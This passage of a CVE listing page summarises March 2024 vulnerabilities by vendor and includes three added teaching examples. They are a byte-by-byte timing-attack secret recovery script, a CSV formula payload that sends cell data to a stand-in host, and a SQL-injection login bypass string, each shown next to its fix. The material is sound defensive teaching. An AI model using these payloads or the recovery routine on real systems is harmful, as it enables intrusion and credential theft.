CVE-2023-28746  Medium    6.5        2024-03-14  Information exposure through microarchitectural state after transient execution from some register files for some Intel(R) Atom(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
CVE-2024-28323  Medium    6.5        2024-03-14  The bwdates-report-result.php file in Phpgurukul User Registration & Login and User Management System 3.1 contains a potential security vulnerability related to user input validation.
CVE-2024-28418  Medium    6.5        2024-03-14  Webedition CMS 9.2.2.0 has a File upload vulnerability via /webEdition/we_cmd.php
CVE-2023-36238  Medium    6.5        2024-03-13  Insecure Direct Object Reference (IDOR) in Bagisto v.1.5.1 allows an attacker to obtain sensitive information via the invoice ID parameter.
CVE-2024-28417  Medium    6.3        2024-03-14  Webedition CMS 9.2.2.0 has a Stored XSS vulnerability via /webEdition/we_cmd.php.
CVE-2023-22655  Medium    6.1        2024-03-14  Protection mechanism failure in some 3rd and 4th Generation Intel(R) Xeon(R) Processors when using Intel(R) SGX or Intel(R) TDX may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2024-28623  Medium    6.1        2024-03-13  RiteCMS v3.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component main_menu/edit_section.
CVE-2023-43292  Medium    6.1        2024-03-12  Cross Site Scripting vulnerability in My Food Recipe Using PHP with Source Code v.1.0 allows a local attacker to execute arbitrary code via a crafted payload to the Recipe Name, Procedure, and ingredients parameters.
CVE-2023-49453  Medium    6.1        2024-03-12  Reflected cross-site scripting (XSS) vulnerability in Racktables v0.22.0 and before, allows local attackers to execute arbitrary code and obtain sensitive information via the search component in index.php.
CVE-2024-28823Medium6.12024-03-11Amazon AWS aws-js-s3-explorer (aka AWS JavaScript S3 Explorer) 1.0.0 allows XSS via a crafted S3 bucket name to index.html.
CVE-2024-26475Medium5.52024-03-14An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function.
CVE-2023-38575Medium5.52024-03-14Non-transparent sharing of return predictor targets between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.
CVE-2024-28401Medium5.42024-03-15TOTOLINK X2000R before v1.0.0-B20231213.1013 contains a Store Cross-site scripting (XSS) vulnerability in Root Access Control under the Wireless Page.
CVE-2024-28403Medium5.42024-03-15TOTOLINK X2000R before V1.0.0-B20231213.1013 is vulnerable to Cross Site Scripting (XSS) via the VPN Page.
CVE-2024-26454Medium5.42024-03-15A Cross Site Scripting vulnerability in Healthcare-Chatbot through 9b7058a can occur via a crafted payload to the email1 or pwd1 parameter in login.php.
CVE-2024-28662Medium5.42024-03-13A Cross Site Scripting vulnerability exists in Piwigo before 14.3.0 script because of missing sanitization in create_tag in admin/include/functions.php.
CVE-2024-28339Medium5.42024-03-12An information leak in the debuginfo.htm component of Netgear CBR40 2.5.0.28, Netgear CBK40 2.5.0.28, and Netgear CBK43 2.5.0.28 allows attackers to obtain sensitive information without any authentication required.
CVE-2023-43490Medium5.32024-03-14Incorrect calculation in microcode keying mechanism for some Intel(R) Xeon(R) D Processors with Intel(R) SGX may allow a privileged user to potentially enable information disclosure via local access.
CVE-2024-26521Medium4.82024-03-12HTML Injection vulnerability in CE Phoenix v1.0.8.20 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted payload to the english.php component.
CVE-2023-27502Low3.32024-03-14Insertion of sensitive information into log file for some Intel(R) Local Manageability Service software before version 2316.5.1.2 may allow an authenticated user to potentially enable information disclosure via local access.

DedeCMS · 23 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28673 | High | 8.8 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/mychannel_edit.php.
CVE-2024-28671 | High | 8.8 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/stepselect_main.php.
CVE-2024-28684 | High | 8.8 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/module_main.php
CVE-2024-28675 | High | 8.8 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/diy_edit.php
CVE-2024-28665 | High | 8.8 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_add.php
CVE-2024-28432 | High | 8.8 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_edit.php.
CVE-2024-28431 | High | 8.8 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/catalog_del.php.
CVE-2024-28682 | Medium | 6.3 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/sys_cache_up.php.
CVE-2024-28678 | Medium | 6.3 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_description_main.php
CVE-2024-28683 | Medium | 6.1 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via create file.
CVE-2024-28681 | Medium | 6.1 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/plus_edit.php.
CVE-2024-28680 | Medium | 6.1 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/diy_add.php.
CVE-2024-28679 | Medium | 6.1 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via Photo Collection.
CVE-2024-28677 | Medium | 6.1 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/article_keywords_main.php.
CVE-2024-28676 | Medium | 6.1 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via /dede/article_edit.php.
CVE-2024-28670 | Medium | 6.1 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/freelist_main.php.
CVE-2024-28668 | Medium | 6.1 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/mychannel_add.php
CVE-2024-28667 | Medium | 6.1 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/templets_one_edit.php
CVE-2024-28430 | Medium | 6.1 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/catalog_edit.php.
CVE-2024-28666 | Medium | 5.5 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/media_add.php
CVE-2024-28429 | Medium | 5.5 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/archives_do.php
CVE-2024-28672 | Medium | 5.4 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/media_edit.php.
CVE-2024-28669 | Medium | 5.4 | | 2024-03-13 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/freelist_edit.php.

IBM · 13 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-22346 | High | 8.4 | | 2024-03-14 | Db2 for IBM i 7.2, 7.3, 7.4, and 7.5 infrastructure could allow a local user to gain elevated privileges due to an unqualified library call.
CVE-2024-27266 | High | 8.2 | | 2024-03-14 | IBM Maximo Application Suite 7.6.1.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data.
CVE-2023-38723 | Medium | 6.4 | | 2024-03-13 | IBM Maximo Application Suite 7.6.1.3 is vulnerable to stored cross-site scripting.
CVE-2021-38938 | Medium | 6.2 | | 2024-03-15 | IBM Host Access Transformation Services (HATS) 9.6 through 9.6.1.4 and 9.7 through 9.7.0.3 stores user credentials in plain clear text which can be read by a local user.
CVE-2023-47699 | Medium | 6.1 | | 2024-03-15 | IBM Sterling Secure Proxy 6.0.3 and 6.1.0 is vulnerable to cross-site scripting.
CVE-2023-47162 | Medium | 6.1 | | 2024-03-15 | IBM Sterling Secure Proxy 6.0.3 and 6.1.0 is vulnerable to cross-site scripting.
CVE-2023-47147 | Medium | 5.9 | | 2024-03-15 | IBM Sterling Secure Proxy 6.0.3 and 6.1.0 could allow an attacker to overwrite a log message under specific conditions.
CVE-2023-46182 | Medium | 5.4 | | 2024-03-15 | IBM Sterling Secure Proxy 6.0.3 and 6.1.0 is vulnerable to cross-site scripting.
CVE-2023-28517 | Medium | 5.4 | | 2024-03-13 | IBM Sterling Partner Engagement Manager 6.1.2, 6.2.0, and 6.2.2 is vulnerable to cross-site scripting.
CVE-2023-43043 | Medium | 5.1 | | 2024-03-13 | IBM Maximo Application Suite - Maximo Mobile for EAM 8.10 and 8.11 could disclose sensitive information to a local user.
CVE-2023-46179 | Medium | 4.3 | | 2024-03-15 | IBM Sterling Secure Proxy 6.0.3 and 6.1.0 does not set the secure attribute on authorization tokens or session cookies.
CVE-2023-46181 | Medium | 4.0 | | 2024-03-15 | IBM Sterling Secure Proxy 6.0.3 and 6.1.0 allows web pages to be stored locally which can be read by another user on the system.
CVE-2023-32335 | Low | 3.7 | | 2024-03-13 | IBM Maximo Application Suite 8.10, 8.11 and IBM Maximo Asset Management 7.6.1.3 stores sensitive information in URL parameters.

Phoenix Contact · 13 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25995 | Critical | 9.8 | | 2024-03-12 | An unauthenticated remote attacker can modify configurations to perform a remote code execution, gain root rights or perform a DoS due to improper input validation.
CVE-2024-26288 | High | 8.7 | | 2024-03-12 | An unauthenticated remote attacker can influence the communication due to the lack of encryption of sensitive data via a MITM.
CVE-2024-25999 | High | 8.4 | | 2024-03-12 | An unauthenticated local attacker can perform a privilege escalation due to improper input validation in the OCPP agent service.
CVE-2024-26002 | High | 7.8 | | 2024-03-12 | An improper input validation in the Qualcom plctool allows a local attacker with low privileges to gain root access by changing the ownership of specific files.
CVE-2024-26004 | High | 7.5 | | 2024-03-12 | An unauthenticated remote attacker can DoS a control agent due to access of an uninitialized pointer which may prevent or disrupt the charging functionality.
CVE-2024-26003 | High | 7.5 | | 2024-03-12 | An unauthenticated remote attacker can DoS the control agent due to an out-of-bounds read which may prevent or disrupt the charging functionality.
CVE-2024-26001 | High | 7.4 | | 2024-03-12 | An unauthenticated remote attacker can write memory out of bounds due to improper input validation in the MQTT stack.
CVE-2024-25998 | High | 7.3 | | 2024-03-12 | An unauthenticated remote attacker can perform a command injection in the OCPP Service with limited privileges due to improper input validation.
CVE-2024-26000 | Medium | 5.9 | | 2024-03-12 | An unauthenticated remote attacker can read memory out of bounds due to improper input validation in the MQTT stack. The brute force attack is not always successful because of memory randomization.
CVE-2024-25997 | Medium | 5.3 | | 2024-03-12 | An unauthenticated remote attacker can perform a log injection due to improper input validation.
CVE-2024-25996 | Medium | 5.3 | | 2024-03-12 | An unauthenticated remote attacker can perform a remote code execution due to an origin validation error.
CVE-2024-25994 | Medium | 5.3 | | 2024-03-12 | An unauthenticated remote attacker can upload an arbitrary script file due to improper input validation. The upload destination is fixed and is write only.
CVE-2024-26005 | Medium | 4.8 | | 2024-03-12 | An unauthenticated remote attacker can gain service level privileges through an incomplete cleanup during service restart after a DoS.

Apache · 11 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-41313 | Critical | 9.8 | | 2024-03-12 | The authentication method in Apache Doris versions before 2.0.0 was vulnerable to timing attacks.
CVE-2024-28752 | Critical | 9.3 | | 2024-03-15 | A SSRF vulnerability using the Aegis DataBinding in versions of Apache CXF before 4.0.4, 3.6.3 and 3.5.8 allows an attacker to perform SSRF style attacks on webservices that take at least one parameter of any type.
CVE-2024-27894 | High | 8.5 | | 2024-03-12 | The Pulsar Functions Worker includes a capability that permits authenticated users to create functions where the function's implementation is referenced by a URL.
CVE-2024-27135 | High | 8.5 | | 2024-03-12 | Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions.
CVE-2024-27317 | High | 8.4 | | 2024-03-12 | In Pulsar Functions Worker, authenticated users can upload functions in jar or nar files.
CVE-2022-34321 | High | 8.2 | | 2024-03-12 | Improper Authentication vulnerability in Apache Pulsar Proxy allows an attacker to connect to the /proxy-stats endpoint without authentication.
CVE-2024-28746 | High | 8.1 | | 2024-03-14 | Apache Airflow, versions 2.8.0 through 2.8.2, has a vulnerability that allows an authenticated user with limited permissions to access resources such as variables, connections, etc from the UI which they do not have permission to access.  …
CVE-2024-24549 | High | 7.5 | | 2024-03-13 | Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat.
CVE-2024-28098 | Medium | 6.4 | | 2024-03-12 | The vulnerability allows authenticated users with only produce or consume permissions to modify topic-level policies, such as retention, TTL, and offloading settings.
CVE-2024-23672 | Medium | 6.3 | | 2024-03-13 | Denial of Service via incomplete cleanup vulnerability in Apache Tomcat.
CVE-2024-23944 | Medium | 5.3 | | 2024-03-15 | Information disclosure in persistent watchers handling in Apache ZooKeeper due to missing ACL check.
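
The Apache Doris entry above (CVE-2023-41313) says only that the authentication method "was vulnerable to timing attacks". The following is an added example, not Doris code and not from the Apache project, showing the general mechanism: an early-exit byte comparison leaks how many leading bytes of a guess were correct, and a noiseless work-count oracle (standing in for the response-time measurement a real attacker would average over many requests) is enough to recover the secret byte by byte. The secret value and the oracle are constructed for the example; the fix is the constant-time comparison in the standard library.

```python
import hmac

# Constructed example secret. In a real deployment this is the server-side
# credential (token, password hash) that the login path compares against.
SECRET = b"s3cr3t-token-4b"


def naive_equal(candidate: bytes, secret: bytes) -> tuple[bool, int]:
    """Early-exit comparison, the pattern that makes authentication timing-dependent.

    Returns (equal, compares). `compares` is how many byte comparisons ran before
    the loop stopped; in a live system that count is what leaks as a response-time
    difference.
    """
    if len(candidate) != len(secret):
        return False, 0
    compares = 0
    for x, y in zip(candidate, secret):
        compares += 1
        if x != y:
            return False, compares
    return True, compares


def safe_equal(candidate: bytes, secret: bytes) -> bool:
    """Constant-time comparison: running time does not depend on where the first mismatch is."""
    return hmac.compare_digest(candidate, secret)


def recover_secret(oracle, length: int) -> bytes:
    """Recover a secret one byte at a time from a work-count oracle.

    `oracle(guess)` returns (accepted, compares). The compare count stands in for a
    timing measurement; `accepted` is the visible login result, which is needed
    for the last byte, where the compare count no longer differs between right
    and wrong guesses.
    """
    known = b""
    for pos in range(length):
        best_byte, best_score = 0, -1
        for b in range(256):
            guess = known + bytes([b]) + b"\x00" * (length - pos - 1)
            accepted, compares = oracle(guess)
            # The correct byte lets the loop run at least one compare further.
            score = compares + (1 if accepted else 0)
            if score > best_score:
                best_byte, best_score = b, score
        known += bytes([best_byte])
    return known


if __name__ == "__main__":
    recovered = recover_secret(lambda g: naive_equal(g, SECRET), len(SECRET))
    print("recovered:", recovered, "matches:", recovered == SECRET)
```

With `safe_equal` in place of `naive_equal` there is no per-byte work count to observe, so the search degrades to guessing the whole value; for hashed credentials, also compare digests of fixed length so that the length check itself does not leak.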

Fortinet · 9 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-48788 | Critical | 9.8 | KEV | 2024-03-12 | An improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via…
CVE-2023-42789 | Critical | 9.8 | | 2024-03-12 | An out-of-bounds write in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13 allows…
CVE-2023-47534 | Critical | 9.6 | | 2024-03-12 | An improper neutralization of formula elements in a csv file in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, 7.0.0 through 7.0.10, 6.4.0 through 6.4.9, 6.2.0 through 6.2.9, 6.0.0 through 6.0.8 allows attacker to execute unauthorized…
CVE-2023-42790 | High | 8.1 | | 2024-03-12 | A stack-based buffer overflow in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13…
CVE-2023-36554 | High | 8.1 | | 2024-03-12 | An improper access control in Fortinet FortiManager version 7.4.0, version 7.2.0 through 7.2.3, version 7.0.0 through 7.0.10, version 6.4.0 through 6.4.13, 6.2 all versions allows attacker to execute unauthorized code or commands via specia…
CVE-2024-23112 | High | 8.0 | | 2024-03-12 | An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiOS version 7.4.0 through 7.4.1, 7.2.0 through 7.2.6, 7.0.1 through 7.0.13, 6.4.7 through 6.4.14, and FortiProxy version 7.4.0 through 7.4.2, 7.2.0 through…
CVE-2023-46717 | High | 7.5 | | 2024-03-12 | An improper authentication vulnerability [CWE-287] in FortiOS versions 7.4.1 and below, versions 7.2.6 and below, and versions 7.0.12 and below when configured with FortiAuthenticator in HA may allow a readonly user to gain read-write acce…
CVE-2023-41842 | Medium | 6.7 | | 2024-03-12 | A use of externally-controlled format string vulnerability [CWE-134] in Fortinet allows a privileged attacker to execute unauthorized code or commands via specially crafted command arguments.
CVE-2024-21761 | Medium | 4.3 | | 2024-03-12 | An improper authorization vulnerability [CWE-285] in FortiPortal version 7.2.0, and versions 7.0.6 and below reports may allow a user to download other organizations reports via modification in the request payload.
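
CVE-2023-47534 above is a CSV formula-injection bug: data that one party controls (an endpoint name, a username) is written into a CSV that an administrator later opens in a spreadsheet, where a leading `=`, `+`, `-`, `@`, tab or carriage return turns the cell into a formula. The block below is an added example, not FortiClientEMS code, of the export-side neutralization a practitioner would want: numeric cells pass through unchanged, text cells that would be read as formulas get a leading single quote, and `csv.writer` quoting keeps the prefix from being broken out of. The sample rows and the `HYPERLINK` payload are constructed for the example.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice and Google Sheets evaluate a
# cell as a formula (the OWASP "CSV injection" list).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def looks_like_formula(value: str) -> bool:
    """True if a spreadsheet would treat this text as a formula when the CSV is opened.

    Leading whitespace is ignored because spreadsheets trim it before deciding.
    """
    return value.lstrip().startswith(FORMULA_TRIGGERS)


def neutralize_cell(value) -> str:
    """Return a value safe to place in a CSV cell.

    Numbers pass through unchanged, so a genuine negative count stays numeric.
    Text that starts with a trigger is prefixed with a single quote, which the
    spreadsheet shows as literal text. csv.writer quotes the whole field, so an
    embedded quote or separator cannot end the cell early.
    """
    if isinstance(value, (bool, int, float)):
        return str(value)
    text = "" if value is None else str(value)
    if looks_like_formula(text):
        return "'" + text
    return text


def export_csv(header, rows) -> str:
    """Render rows to CSV text with every data cell neutralized."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample: the second endpoint's hostname was set by an attacker-
# controlled client to a formula before an administrator exports the report.
SAMPLE_ROWS = [
    ("ws-0142", "alice", "10.0.0.12", 3),
    ('=HYPERLINK("https://example.invalid/?x="&A1,"open")', "mallory", "10.0.0.99", -1),
]

if __name__ == "__main__":
    print(export_csv(["hostname", "user", "ip", "alerts"], SAMPLE_ROWS))
```

The same `looks_like_formula` check is also useful at ingestion time, to flag or reject names that arrive already formula-shaped, since an export path added later may not neutralize them.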

Leap13 · 9 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2399 | Medium | 6.4 | | 2024-03-15 | The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.10.23 due to insufficient input sanitization and output escaping on user su…
CVE-2024-2239 | Medium | 6.4 | | 2024-03-13 | The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Premium Magic Scroll module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping.
CVE-2024-2238 | Medium | 6.4 | | 2024-03-13 | The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Mouse Cursor module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping.
CVE-2024-2237 | Medium | 6.4 | | 2024-03-13 | The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Global Badge module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping.
CVE-2024-2000 | Medium | 6.4 | | 2024-03-13 | The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'navigation_dots' parameter of the Multi Scroll Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitization and…
CVE-2024-1997 | Medium | 6.4 | | 2024-03-13 | The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'premium_fbchat_app_id' parameter of the Messenger Chat Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitiza…
CVE-2024-1996 | Medium | 6.4 | | 2024-03-13 | The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's IHover widget link in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping on user su…
CVE-2024-1680 | Medium | 6.4 | | 2024-03-13 | The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Settings URL of the Banner, Team Members, and Image Scroll widgets in all versions up to, and including, 4.10.21 due to insuff…
CVE-2024-0326 | Medium | 6.4 | | 2024-03-13 | The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Link Wrapper functionality in all versions up to, and including, 4.10.17 due to insufficient input sanitization and output…

Siemens · 9 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-22039 | Critical | 10.0 | | 2024-03-12 | A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions < IP8), Cerberus PRO EN Fire Panel FC72x IP6 (All versions < IP6 SR3), Cerberus PRO EN Fire Panel FC72x IP7 (All versions < IP7 SR5), Cerberus PRO EN X20…
CVE-2022-32257 | Critical | 9.8 | | 2024-03-12 | A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V3.2).
CVE-2024-27907 | High | 7.8 | | 2024-03-12 | A vulnerability has been identified in Simcenter Femap (All versions < V2306.0000).
CVE-2024-22045 | High | 7.6 | | 2024-03-12 | A vulnerability has been identified in SINEMA Remote Connect Client (All versions < V3.1 SP1).
CVE-2024-22044 | High | 7.5 | | 2024-03-12 | A vulnerability has been identified in SENTRON 3KC ATC6 Expansion Module Ethernet (3KC9000-8TL75) (All versions).
CVE-2024-22041 | High | 7.5 | | 2024-03-12 | A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions), Cerberus PRO EN Fire Panel FC72x IP6 (All versions), Cerberus PRO EN Fire Panel FC72x IP7 (All versions), Cerberus PRO EN Fire Panel FC72x IP8 (All ver…
CVE-2024-22040 | High | 7.5 | | 2024-03-12 | A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions), Cerberus PRO EN Fire Panel FC72x IP6 (All versions), Cerberus PRO EN Fire Panel FC72x IP7 (All versions), Cerberus PRO EN Fire Panel FC72x IP8 (All ver…
CVE-2023-45793 | Medium | 5.5 | | 2024-03-12 | A vulnerability has been identified in Siveillance Control (All versions >= V2.8 < V3.1.1).
CVE-2024-21483 | Medium | 4.6 | | 2024-03-12 | A vulnerability has been identified in SENTRON 7KM PAC3120 AC/DC (7KM3120-0BA01-1DA0) (All versions >= V3.2.3 < V3.2.4 only when manufactured between LQN231003...

Cisco · 8 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-20320 | High | 7.8 | | 2024-03-13 | A vulnerability in the SSH client feature of Cisco IOS XR Software for Cisco 8000 Series Routers and Cisco Network Convergence System (NCS) 540 Series and 5700 Series Routers could allow an authenticated, local attacker to elevate privileg…
CVE-2024-20327 | High | 7.4 | | 2024-03-13 | A vulnerability in the PPP over Ethernet (PPPoE) termination feature of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, adjacent attacker to crash the ppp_ma process, resulting i…
CVE-2024-20318 | High | 7.4 | | 2024-03-13 | A vulnerability in the Layer 2 Ethernet services of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause the line card network processor to reset, resulting in a denial of service (DoS) condition. This vulner…
CVE-2024-20262 | Medium | 6.5 | | 2024-03-13 | A vulnerability in the Secure Copy Protocol (SCP) and SFTP feature of Cisco IOS XR Software could allow an authenticated, local attacker to create or overwrite files in a system directory, which could lead to a denial of service (DoS) cond…
CVE-2024-20322 | Medium | 5.8 | | 2024-03-13 | A vulnerability in the access control list (ACL) processing on Pseudowire interfaces in the ingress direction of Cisco IOS XR Software could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due…
CVE-2024-20315 | Medium | 5.8 | | 2024-03-13 | A vulnerability in the access control list (ACL) processing on MPLS interfaces in the ingress direction of Cisco IOS XR Software could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due to im…
CVE-2024-20266 | Medium | 5.3 | | 2024-03-13 | A vulnerability in the DHCP version 4 (DHCPv4) server feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to trigger a crash of the dhcpd process, resulting in a denial of service (DoS) condition. This vulne…
CVE-2024-20319 | Medium | 4.3 | | 2024-03-13 | A vulnerability in the UDP forwarding code of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to bypass configured management plane protection policies and access the Simple Network Management Plane (SNMP) server of…

Code-projects · 8 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-41505 | Critical | 9.8 | | 2024-03-13 | An arbitrary file upload vulnerability in the Add Student's Profile Picture function of Student Enrollment In PHP v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.
CVE-2024-24101 | Critical | 9.8 | | 2024-03-12 | Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection under Eligibility Information Update.
CVE-2024-24093 | Critical | 9.8 | | 2024-03-12 | SQL Injection vulnerability in Code-projects Scholars Tracking System 1.0 allows attackers to run arbitrary code via Personal Information Update information.
CVE-2023-41504 | High | 8.8 | | 2024-03-13 | SQL Injection vulnerability in Student Enrollment In PHP 1.0 allows attackers to run arbitrary code via the Student Search function.
CVE-2024-24092 | High | 7.8 | | 2024-03-12 | SQL Injection vulnerability in Code-projects.org Scholars Tracking System 1.0 allows attackers to run arbitrary code via login.php.
CVE-2023-42308 | Medium | 6.1 | | 2024-03-12 | Cross Site Scripting (XSS) vulnerability in Manage Fastrack Subjects in Code-Projects Exam Form Submission 1.0 allows attackers to run arbitrary code via the "Subject Name" and "Subject Code" Section.
CVE-2023-42307 | Medium | 6.1 | | 2024-03-12 | Cross Site Scripting (XSS) vulnerability in Code-Projects Exam Form Submission 1.0 allows attackers to run arbitrary code via "Subject Name" and "Subject Code" section.
CVE-2024-24097 | Medium | 5.4 | | 2024-03-12 | Cross Site Scripting (XSS) vulnerability in Code-projects Scholars Tracking System 1.0 allows attackers to run arbitrary code via the News Feed.
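
Several entries on this page (CVE-2024-24092 here, CVE-2024-25325 and CVE-2024-28816 earlier) are SQL injection through a login form's username or e-mail field. The block below is an added example, not code from any of those projects, showing the defect and its fix side by side in Python with an in-memory SQLite table: the vulnerable handler splices the username into the SQL text, so a quote character rewrites the query and the password check is commented out; the parameterized handler sends values separately from the statement, so the same payload is just a username that does not exist. The account, the password stand-in hash and the payload string are constructed for the example.

```python
import hashlib
import sqlite3


def fake_password_hash(password: str) -> str:
    """Stand-in for a real password hash (use argon2 or bcrypt in production);
    kept short so the example stays about the query, not credential storage."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT, role TEXT)"
    )
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        ("admin", fake_password_hash("correct horse battery"), "administrator"),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """The pattern behind 'SQL injection via login.php': untrusted input is
    spliced into the SQL text, so a quote in `username` changes the query's
    structure instead of being data."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password_hash = '{fake_password_hash(password)}'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username: str, password: str):
    """Parameterized query: the driver binds values separately from the SQL
    text, so the payload cannot alter the WHERE clause."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password_hash = ?",
        (username, fake_password_hash(password)),
    ).fetchone()


# Constructed payload: closes the string literal, then `--` comments out the
# rest of the line, including the password comparison.
BYPASS_USERNAME = "admin' --"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", login_vulnerable(db, BYPASS_USERNAME, "wrong"))
    print("safe:      ", login_safe(db, BYPASS_USERNAME, "wrong"))
```

The vulnerable call returns the administrator row with a wrong password; the safe call returns nothing. Escaping quotes is not a substitute for parameter binding, since the escaping rules differ per database and per encoding.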

Binhnguyenplus · 7 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
